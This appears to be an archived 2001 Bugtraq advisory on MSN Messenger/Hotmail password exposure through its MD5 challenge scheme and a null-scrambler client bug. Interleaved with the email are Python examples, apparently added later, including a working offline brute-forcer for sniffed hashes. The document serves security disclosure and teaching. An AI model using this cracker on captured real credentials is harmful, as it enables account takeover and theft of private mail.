[21412] in bugtraq


Messenger/Hotmail passwords at risk

daemon@ATHENA.MIT.EDU (gregory duchemin)
Mon Jul 9 15:11:02 2001

From: "gregory duchemin" <c3rb3r@hotmail.com>
To: BUGTRAQ@securityfocus.com
Date: Fri, 06 Jul 2001 21:32:36 -0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F7416xsoIIzQtO9vXLs000040f6@hotmail.com>

hi bugtraqers,


Background
==========

I sent the following advisory to Microsoft about a month ago and have not
received any reply since.
The problem described below still works against the latest MSN client
version currently available.
A bug in the Hotmail Messenger cryptographic system may allow the recovery
of the passwords of millions of Hotmail mailboxes.

Microsoft MSN Messenger is a very handy little Win32 application designed to
keep in touch with friends, family and collaborators around the world.
It offers many nice features like real-time chat, Hotmail mailbox access,
etc.

Messenger uses its own protocol to communicate with a set of dedicated
Microsoft servers and authenticates itself with the same password Hotmail
uses (through the global Passport system).
The password is not sent in the clear on the wire but hashed with MD5 in the
following manner:


Authentication Scheme
=====================

While negotiating a connection with a remote Microsoft server, the MSN client
sends in the clear the mailbox to be authenticated (basically the username)
and gets back a scrambler string to be prepended to the password before
hashing it and sending the result.

client ----- VER xx MSNP5 MSNP4 CVR0 --------------->  MSN server

client <---- VER xx MSNP5 MSNP4 CVR0 ---------------   MSN server

client ----- INF (xx+1) ---------------------------->  MSN server

client <---- INF (xx+1) MD5 ------------------------   MSN server

client ----- USR (xx+2) MD5 I ---------------------->  MSN server

client <---- USR (xx+2) MD5 S yyyyyyyyy.yyyyyyyyy --   MSN server
             (the scrambler string is actually made of seconds.microseconds)

client ----- USR (xx+3) MD5 S xxxxx...(32 chars) --->  MSN server


Here it is: the password hash has been sent and can easily be broken by
brute force.


Hash Creation Process
=====================

Say user toto has the password "titan".
His client then generates the string "yyyyyyyyy.yyyyyyyyytitan" and the
corresponding MD5 hash, say xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
The client sends MD5(yyyyyyyyy.yyyyyyyyytitan) on the wire, as 32 hex
characters.
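The exchange and hash computation described above, replayed with both sides in one process. This is an added example, not the MSN client's or Microsoft's code: the user name, password and transaction IDs are constructed, and the challenge can be pinned so that a run is reproducible.

```python
import hashlib
import hmac
import time

# Added example: replays the MSNP5 MD5 exchange from the post with the
# client and the server in one process. Names, password and trids are
# constructed; the message formats follow the diagram above.

HEX32 = set("0123456789abcdef")


def make_challenge(now=None):
    """Server side: the scrambler is 'seconds.microseconds' of the server clock."""
    if now is None:
        now = time.time()
    secs = int(now)
    usec = int((now - secs) * 1_000_000)
    return f"{secs}.{usec}"


def md5_response(challenge, password):
    """Client side: MD5(scrambler || password) as 32 lowercase hex characters."""
    return hashlib.md5((challenge + password).encode("utf-8")).hexdigest()


def server_verify(challenge, stored_password, response):
    """Server side. Note the verifier needs the password itself (or something
    equivalent) to recompute MD5(scrambler || password) for this scrambler."""
    response = response.lower()
    if len(response) != 32 or set(response) - HEX32:
        return False
    return hmac.compare_digest(md5_response(challenge, stored_password), response)


def run_handshake(user, client_password, server_password, challenge=None, trid=0):
    """Run the exchange and return (transcript, authenticated).
    'challenge' may be pinned for reproducibility; otherwise the clock is used."""
    if challenge is None:
        challenge = make_challenge()
    transcript = []

    def c(msg):
        transcript.append("C: " + msg)

    def s(msg):
        transcript.append("S: " + msg)

    c(f"VER {trid} MSNP5 MSNP4 CVR0")
    s(f"VER {trid} MSNP5 MSNP4 CVR0")
    c(f"INF {trid + 1}")
    s(f"INF {trid + 1} MD5")
    c(f"USR {trid + 2} MD5 I {user}")        # username crosses the wire in the clear
    s(f"USR {trid + 2} MD5 S {challenge}")   # so does the scrambler
    response = md5_response(challenge, client_password)
    c(f"USR {trid + 3} MD5 S {response}")    # and the hash a sniffer will attack offline

    # Server parses the last client line and checks it against its copy of the password.
    parts = transcript[-1][3:].split(" ")
    ok = (len(parts) == 5 and parts[0] == "USR" and parts[2:4] == ["MD5", "S"]
          and server_verify(challenge, server_password, parts[4]))
    return transcript, ok


if __name__ == "__main__":
    lines, ok = run_handshake("toto@hotmail.com", "titan", "titan")
    print("\n".join(lines))
    print("authenticated:", ok)
```

Everything a passive observer needs for the attack in the next section is in the two `USR ... S` lines of the transcript: the scrambler and the 32-character hash.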


Problem
=======

By sniffing the wire, a malicious user can obviously retrieve the scrambler
string and the final hash.
He can then start a brute-force session, trying all password combinations
with the same scrambler prepended and comparing the resulting hash with the
one he previously sniffed (an exhaustive attack).


Basically, even without any bug, Messenger is already vulnerable because of
the weak cryptographic scheme it uses: the scrambler only prevents replaying
a sniffed hash or precomputing hashes ahead of time; it does not slow down
the offline search at all, since one MD5 per candidate is all that is needed.


Exploit
=======

I wrote, with the great help of Simeon Pilgrim, a very fast MD5 brute-forcer
designed to use scrambler strings to recover the original password for a
given MD5 hash.


Currently it takes only 12 days to exhaust all 8-character passwords in the
charset [a-z0-9] at an average speed of 2,600,000 hashes/sec on a single
1 GHz Athlon processor. (I expect to be able to test up to 4,000,000
hashes/sec with the next release and a single 1.3 GHz processor.)

Win32/Unix versions are freely available at http://mdcrack.multimania.com
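The offline search from the Problem section, and the keyspace arithmetic behind the figures in the Exploit section, as an added example. This is not the mdcrack tool the post links to: the capture is constructed in-process from a hypothetical password so that the example runs offline, where a real attacker would read the scrambler and the hash off the wire.

```python
import hashlib
import itertools
import string

# Added example, not the mdcrack tool from the post. It performs the attack
# step the post describes: take the scrambler and the 32-char hash that a
# sniffer saw and search the password space with the scrambler prepended.
# The "capture" is constructed here from a hypothetical password.

CHARSET = string.ascii_lowercase + string.digits   # [a-z0-9], as in the post


def md5_response(challenge, password):
    """The client's computation: MD5(scrambler || password), lowercase hex."""
    return hashlib.md5((challenge + password).encode("utf-8")).hexdigest()


def simulate_capture(password, challenge="994467156.241073"):
    """What a sniffer gets: the scrambler from 'USR n MD5 S <scrambler>' and the
    32 hex chars from 'USR n+1 MD5 S <hash>'. Constructed, not a real capture."""
    return challenge, md5_response(challenge, password)


def brute_force(challenge, target_hash, charset=CHARSET, max_len=4):
    """Exhaustive search in increasing length. Returns (password, hashes_tried),
    or (None, hashes_tried) if nothing up to max_len matches.
    The scrambler rules out precomputed tables (every login gets a fresh
    prefix) but not this search: one MD5 per candidate is all it costs."""
    target = target_hash.lower()
    tried = 0
    for length in range(1, max_len + 1):
        for cand in itertools.product(charset, repeat=length):
            tried += 1
            pw = "".join(cand)
            if md5_response(challenge, pw) == target:
                return pw, tried
    return None, tried


def exhaust_days(charset_size, length, hashes_per_second):
    """Worst-case time to cover charset_size**length candidates at a given rate."""
    return charset_size ** length / hashes_per_second / 86400


if __name__ == "__main__":
    chal, h = simulate_capture("ab12")
    pw, n = brute_force(chal, h)
    print(f"recovered {pw!r} after {n} hashes")
    print(f"[a-z0-9]^8 at 2.6M hashes/s: {exhaust_days(36, 8, 2_600_000):.1f} days")
```

The 12-day figure in the post is exactly what `exhaust_days(36, 8, 2_600_000)` gives; the same function shows why the Problem 2 passwords of 1 to 7 characters fall in hours or less, and why the "at least 9 chars" advice in the conclusion only buys a factor of 36 per extra character against this scheme.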



Problem 2
=========

Another important point is that, although users nowadays cannot choose a new
password shorter than 8 characters, all the old, weak passwords (from 1 to 7
characters) are still in use and work perfectly with MSN.
How many users are currently at risk? Too many for my fingers, I bet.




Problem 3
=========

The last point is a nasty bug in the client implementation that allows a
malicious user spoofing the MSN server to send a (NULL) scrambler string.
In such a case, instead of simply closing the connection, the client sends
the bare password hash, making things even faster for a subsequent
brute-force attack: with no scrambler involved, a precomputed dictionary of
MD5(password) values can be reused against every victim.


client <---- USR (xx+2) MD5 S ----------------------   fake MSN server

client ----- USR (xx+3) MD5 S xxxxx...(32 chars) --->  fake MSN server

where xxxx...(32 chars) is actually MD5(password).
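The client-side handling of the spoofed `USR ... MD5 S` line, as an added example that is not the MSN client's code: a parser that behaves the way the post describes (an empty scrambler yields a bare MD5(password)) next to a hardened one that closes the connection instead. The message lines are constructed, and the scrambler format checked by the hardened version is the seconds.microseconds form the post gives.

```python
import hashlib
import re

# Added example, not the MSN client's code. The vulnerable function mirrors
# the behaviour the post describes; the hardened one refuses to hash unless
# the scrambler looks like 'seconds.microseconds'. All lines are constructed.

CHALLENGE_RE = re.compile(r"[0-9]+\.[0-9]+")


class ProtocolError(Exception):
    pass


def parse_usr_challenge(line):
    """Extract the scrambler from 'USR <trid> MD5 S <scrambler>'.
    Returns '' when the field is absent or empty, which is the spoofed case."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) < 4 or parts[0] != "USR" or parts[2] != "MD5" or parts[3] != "S":
        raise ProtocolError(f"unexpected line: {line!r}")
    return parts[4] if len(parts) > 4 else ""


def vulnerable_client_response(line, password):
    """The bug: no check on the scrambler, so an empty one yields MD5(password)."""
    challenge = parse_usr_challenge(line)
    return hashlib.md5((challenge + password).encode("utf-8")).hexdigest()


def hardened_client_response(line, password):
    """Returns the hash only for a well-formed scrambler; None means
    'close the connection', which is what the post says the client should do."""
    challenge = parse_usr_challenge(line)
    if not CHALLENGE_RE.fullmatch(challenge):
        return None
    return hashlib.md5((challenge + password).encode("utf-8")).hexdigest()


if __name__ == "__main__":
    spoofed = "USR 2 MD5 S "                    # what the fake server sends
    genuine = "USR 2 MD5 S 994467156.241073"
    print("vulnerable, spoofed:", vulnerable_client_response(spoofed, "password"))
    print("hardened,   spoofed:", hardened_client_response(spoofed, "password"))
    print("hardened,   genuine:", hardened_client_response(genuine, "password"))
```

The check only removes the shortcut: a fake server that supplies a well-formed scrambler of its own choosing still receives a hash it can attack offline, which is the weakness of the scheme itself rather than of this client bug.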


Note that while this technique is stealthy, in some network topologies it may
require ICMP redirect or ARP spoofing to redirect all the traffic to the
attacker's machine within a given network.
But this kind of attack is well known to network crackers.

Note that all communications between clients and servers are in the clear,
so many other identity-theft attacks remain available as well: for instance,
when the victim asks Messenger to open his mailbox, the malicious user may
send the client a different URL, such as a spoofed site with a fake Hotmail
re-login page.



Conclusion
==========

Because Hotmail and MSN use the same authentication system, called Passport,
compromising a user's MSN account is in the end the same as compromising his
Hotmail mailbox.
A malicious user with a freshly cracked MSN password can use it either with
Messenger or with www.hotmail.com.

Because a tremendous number of people use these services without taking much
care about the strength of their password, the number of potential victims is
really large.

The attack described above can be launched from any place on the path between
the victim and the MSN servers, or simply from the same network; that is the
only prerequisite.

Choose a reasonably strong password (at least 9 characters from a good
charset) and change it as regularly as possible.
Finally, never, never trust Hotmail or any other free web-based account with
your own private mail.


========

Gregory Duchemin
Security Consultant

NEUROCOM CANADA
1001 Bd Maisonneuve Ouest, Suite 200
Montreal Quebec
H3A 3C8 Canada
phone: 514 908 6800
Email: gdn@neurocom.com

